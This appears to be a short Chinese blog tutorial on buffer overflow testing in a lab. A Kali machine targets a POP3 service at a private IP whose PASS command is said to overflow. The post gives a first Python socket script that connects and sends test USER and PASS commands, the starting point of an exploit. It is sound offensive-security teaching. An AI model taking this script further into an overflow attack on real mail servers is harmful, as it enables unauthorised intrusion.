https://www.cnblogs.com/xuyiqing/p/9835561.html
下面就是Kali虚拟机对缓冲区溢出的测试:
已经知道目标IP为:192.168.163.130
连接目标机器110端口成功,接下来进行测试
事先已经知道PASS命令存在缓冲区溢出漏洞:
只要在PASS后边输入的数据达到某一个值时,就会出现缓冲区溢出漏洞
但是,手动尝试这个值实在有点低端,写一个Python脚本:
先写一个基本的脚本来测试:
#!/usr/bin/python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: print "\nSending evil buffer..." s.connect(('192.168.163.130', 110)) data = s.recv(1024) print data s.send('USER test' + '\r\n') data = s.recv(1024) print data s.send('PASS test\r\n') data = s.recv(1024) print data s.close() print '\nDone' except: print 'Can not connect to POP3'